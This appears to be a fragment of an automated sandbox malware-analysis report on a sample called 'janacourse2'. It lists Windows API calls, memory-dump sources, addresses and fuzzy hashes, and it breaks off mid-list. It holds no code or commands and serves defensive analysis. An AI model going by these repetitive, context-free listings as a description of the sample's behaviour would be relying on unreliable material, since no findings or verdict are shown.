                                                                                                            • API String ID: 1592001646-0
                                                                                                            • Opcode ID: a212f10f25efe7f12defa05f8b3d16c20959f739b69047da569d19af422ade64
                                                                                                            • Instruction ID: 5cb2f9a44c707dfe54f58c2efb17cf9c7e063f85f212fa5e39b0436ed092f43a
                                                                                                            • Opcode Fuzzy Hash: a212f10f25efe7f12defa05f8b3d16c20959f739b69047da569d19af422ade64
                                                                                                            • Instruction Fuzzy Hash: 46218E71E01109EFDB14CFA8CA44BEEBBF8EF44354F084899E681A7244D739AA05CB50
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0104280A
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01042824
                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 01042832
                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 01042840
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                            • String ID:
                                                                                                            • API String ID: 2169480361-0
                                                                                                            • Opcode ID: 245ecbde02268879735c5506111a3e8190b54be2158dd5c629d6fe4259fdad63
                                                                                                            • Instruction ID: 58e8991702c93cec98a820a96cde8684f3b993a2571a995deb592f9085b75e9d
                                                                                                            • Opcode Fuzzy Hash: 245ecbde02268879735c5506111a3e8190b54be2158dd5c629d6fe4259fdad63
                                                                                                            • Instruction Fuzzy Hash: A321F475305111AFE714DB24D884FAA7B95AF45324F1481A8F4568B6D2C775EC82CBD0
                                                                                                            APIs
                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 0102CE89
                                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 0102CEEA
                                                                                                            • SetEvent.KERNEL32(?,?,00000000), ref: 0102CEFE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorEventFileInternetLastRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 234945975-0
                                                                                                            • Opcode ID: 79a352e2c134d5483603dff63958b8d209855d3a566b0b8c0e5994b8183d4f70
                                                                                                            • Instruction ID: cc9414fad9814a1771411ae931ea3d106ddf88c4f405c1849994d0ffa752215a
                                                                                                            • Opcode Fuzzy Hash: 79a352e2c134d5483603dff63958b8d209855d3a566b0b8c0e5994b8183d4f70
                                                                                                            • Instruction Fuzzy Hash: C421C1B15007159BFB70DF69CB84BABBBFCEB40358F10445EE686D2141E775EA048B50
                                                                                                            APIs
                                                                                                              • Part of subcall function 01018D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0101790A,?,000000FF,?,01018754,00000000,?,0000001C,?,?), ref: 01018D8C
                                                                                                              • Part of subcall function 01018D7D: lstrcpyW.KERNEL32(00000000,?,?,0101790A,?,000000FF,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01018DB2
                                                                                                              • Part of subcall function 01018D7D: lstrcmpiW.KERNEL32(00000000,?,0101790A,?,000000FF,?,01018754,00000000,?,0000001C,?,?), ref: 01018DE3
                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01017923
                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01017949
                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,01018754,00000000,?,0000001C,?,?,00000000), ref: 01017984
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                            • String ID: cdecl
                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                            • Opcode ID: f8af95a7388631d74da240636a4c0639ca4cecd92022745e74c5be56a5978efe
                                                                                                            • Instruction ID: 9a839eb442920e9571a91052508ef650111ceacbdd63bcbd0a5d75d7e81b7271
                                                                                                            • Opcode Fuzzy Hash: f8af95a7388631d74da240636a4c0639ca4cecd92022745e74c5be56a5978efe
                                                                                                            • Instruction Fuzzy Hash: 7C112C3A200302ABDB155F38C844D7B77E6FF85350B40402EF982C7268EB359905C791
                                                                                                            APIs
                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 01047D0B
                                                                                                            • SetWindowLongW.USER32(00000000,000000F0,?), ref: 01047D2A
                                                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 01047D42
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0102B7AD,00000000), ref: 01047D6B
                                                                                                              • Part of subcall function 00FC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00FC9BB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long
                                                                                                            • String ID:
                                                                                                            • API String ID: 847901565-0
                                                                                                            • Opcode ID: 4c76dcb85b4b6174bf561ba82a47f172c0658467204cdb7c20839ea58713721d
                                                                                                            • Instruction ID: af3a6a7a87c682408de106786b74608be5ca684958129637e1f4bd4cc2aaf80d
                                                                                                            • Opcode Fuzzy Hash: 4c76dcb85b4b6174bf561ba82a47f172c0658467204cdb7c20839ea58713721d
                                                                                                            • Instruction Fuzzy Hash: D011D2B2215615AFDB20AF2CCC84A6A3BA5BF45360B118378F9F9C72E0D7359951CB80
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 010456BB
                                                                                                            • _wcslen.LIBCMT ref: 010456CD
                                                                                                            • _wcslen.LIBCMT ref: 010456D8
                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 01045816
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 455545452-0
                                                                                                            • Opcode ID: 8447211197d05930f6343d3a7e19f4261ef3e06daadd59ee97ddabf58aa7b675
                                                                                                            • Instruction ID: 3d93d3c10a826dc1f7eab27f604f2842976d09a44b879efd3d851b271cbdbf66
                                                                                                            • Opcode Fuzzy Hash: 8447211197d05930f6343d3a7e19f4261ef3e06daadd59ee97ddabf58aa7b675
                                                                                                            • Instruction Fuzzy Hash: 991103F5600208A7EB20DF65DCC1AEE3BACEF05364B00407AFA85DA081EB74D640CB60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 0a0d392158d77651cf1b205dca71212903d88269a790de22cc535a8435df1eac
                                                                                                            • Instruction ID: 17f00632a999bc74f516eff29feabdc87afc1d49eb753d924f7410cf98f10681
                                                                                                            • Opcode Fuzzy Hash: 0a0d392158d77651cf1b205dca71212903d88269a790de22cc535a8435df1eac
                                                                                                            • Instruction Fuzzy Hash: 0E01A2B260A69A3EF731257B6CC1F2B761CEF813B8B310329F521511D6DB798C047160
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 01011A47
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01011A59
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01011A6F
                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 01011A8A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3850602802-0
                                                                                                            • Opcode ID: 1b84d2acb9ff0eab1b70a3c6dbf53dbaba303f399193ccae443ac119eb4dd144
                                                                                                            • Instruction ID: 95a2f854a42774ff36aaf73af5f147cb1b2ba800843af3e84a3f9763a182d845
                                                                                                            • Opcode Fuzzy Hash: 1b84d2acb9ff0eab1b70a3c6dbf53dbaba303f399193ccae443ac119eb4dd144
                                                                                                            • Instruction Fuzzy Hash: 0211397AD00219FFEB11DBA8C985FADBBB8EB08754F200091EA00B7294D6716E50DB94
                                                                                                            APIs
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0101E1FD
                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0101E230
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0101E246
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0101E24D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 2880819207-0
                                                                                                            • Opcode ID: 23e73bea376fcfacf3e4500a3d84c441559e6555f49d6e3ef0150299fdf0a41c
                                                                                                            • Instruction ID: 89eb12cb8b11317a76563c4d8bd96fded07c78d1ff5e1df41905b60ad14040e2
                                                                                                            • Opcode Fuzzy Hash: 23e73bea376fcfacf3e4500a3d84c441559e6555f49d6e3ef0150299fdf0a41c
                                                                                                            • Instruction Fuzzy Hash: 05112BB6A04254BFD7229FACDD45ADE7FACAF46310F048255FD94D3285D2B9C90087A0
                                                                                                            APIs
                                                                                                            • CreateThread.KERNEL32(00000000,?,00FDCFF9,00000000,00000004,00000000), ref: 00FDD218
                                                                                                            • GetLastError.KERNEL32 ref: 00FDD224
                                                                                                            • __dosmaperr.LIBCMT ref: 00FDD22B
                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 00FDD249
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                            • String ID:
                                                                                                            • API String ID: 173952441-0
                                                                                                            • Opcode ID: 0a8b53a89214ba34563f83cb974e2d6def4b953a01c376d0b01a32b994c97749
                                                                                                            • Instruction ID: 224035662d669e266da431c094b1481719d8a2d8e96cb0741bbd95ceedb361a1
                                                                                                            • Opcode Fuzzy Hash: 0a8b53a89214ba34563f83cb974e2d6def4b953a01c376d0b01a32b994c97749
                                                                                                            • Instruction Fuzzy Hash: 9801F9768051047BD7216BA5DC09BAE7B6EDF82332F18031AF925923D0DB75C905E7A0
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB604C
                                                                                                            • GetStockObject.GDI32(00000011), ref: 00FB6060
                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB606A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3970641297-0
                                                                                                            • Opcode ID: 0e7ce88681db281fd9832318248699f7c09521648574f548000558d0a9d94f3d
                                                                                                            • Instruction ID: 7ee76662f6cbfd8d993508317fdef340f57d3a34c964abbbaa879b2c549e282d
                                                                                                            • Opcode Fuzzy Hash: 0e7ce88681db281fd9832318248699f7c09521648574f548000558d0a9d94f3d
                                                                                                            • Instruction Fuzzy Hash: 771161B3502548BFEF229F969D44EFA7B69FF093A4F040115FA5492110D73A9C60EF90
                                                                                                            APIs
                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00FD3B56
                                                                                                              • Part of subcall function 00FD3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00FD3AD2
                                                                                                              • Part of subcall function 00FD3AA3: ___AdjustPointer.LIBCMT ref: 00FD3AED
                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00FD3B6B
                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00FD3B7C
                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 00FD3BA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                            • String ID:
                                                                                                            • API String ID: 737400349-0
                                                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction ID: f0edf08cb407e4859df5f797cf20c300daa63f414c5de571fc7dfd6a7705e908
                                                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                                            • Instruction Fuzzy Hash: 52012D32500148BBDF126F95CC46DEB3B6AEF88754F08401AFE4856221C736E961EBA1
                                                                                                            APIs
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00FB13C6,00000000,00000000,?,00FE301A,00FB13C6,00000000,00000000,00000000,?,00FE328B,00000006,FlsSetValue), ref: 00FE30A5
                                                                                                            • GetLastError.KERNEL32(?,00FE301A,00FB13C6,00000000,00000000,00000000,?,00FE328B,00000006,FlsSetValue,01052290,FlsSetValue,00000000,00000364,?,00FE2E46), ref: 00FE30B1
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00FE301A,00FB13C6,00000000,00000000,00000000,?,00FE328B,00000006,FlsSetValue,01052290,FlsSetValue,00000000), ref: 00FE30BF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 3177248105-0
                                                                                                            • Opcode ID: bfe36360524650c3076d9d44eb17f50a828a72c02d85b081afce90e426ef3144
                                                                                                            • Instruction ID: 3011afab7b876b71ba6e7145b7771c9c957536b63e678d0e224712eeb2c59fc4
                                                                                                            • Opcode Fuzzy Hash: bfe36360524650c3076d9d44eb17f50a828a72c02d85b081afce90e426ef3144
                                                                                                            • Instruction Fuzzy Hash: 44012B76702262ABDB318A7B9D8CA677B98AF45B75B200620FB45E3144C736D901D7E0
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0101747F
                                                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 01017497
                                                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 010174AC
                                                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 010174CA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 1352324309-0
                                                                                                            • Opcode ID: 6722914d0fdf05ae64a152903ffaa93683ce6378fa169d1b74fc13dbc92f3ce1
                                                                                                            • Instruction ID: 712a0ae8211ceec448b087787fa7486ad2332877b96042009056c62e4e498951
                                                                                                            • Opcode Fuzzy Hash: 6722914d0fdf05ae64a152903ffaa93683ce6378fa169d1b74fc13dbc92f3ce1
                                                                                                            • Instruction Fuzzy Hash: 1311A1B52423009BF7308F58DE48B967FFCEB40B00F008569EA96D6155DF79E904CB50
                                                                                                            APIs
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B0C4
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B0E9
                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B0F3
                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0101ACD3,?,00008000), ref: 0101B126
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CounterPerformanceQuerySleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 2875609808-0
                                                                                                            • Opcode ID: 34f0325f155ecdd9f714a18a0dd03134aea41f1f0ff92f55abd6cd33e2b06163
                                                                                                            • Instruction ID: 4743d5be49f21fe29f69951b33827881667e1a1ca3d16e45835f577dcc05f0cf
                                                                                                            • Opcode Fuzzy Hash: 34f0325f155ecdd9f714a18a0dd03134aea41f1f0ff92f55abd6cd33e2b06163
                                                                                                            • Instruction Fuzzy Hash: E611AD70C0251CE7DF10AFE4EA88AEEBF78FF0A310F114086E9C1B2189CB3996508B51
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 01012DC5
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 01012DD6
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 01012DDD
                                                                                                            • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 01012DE4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
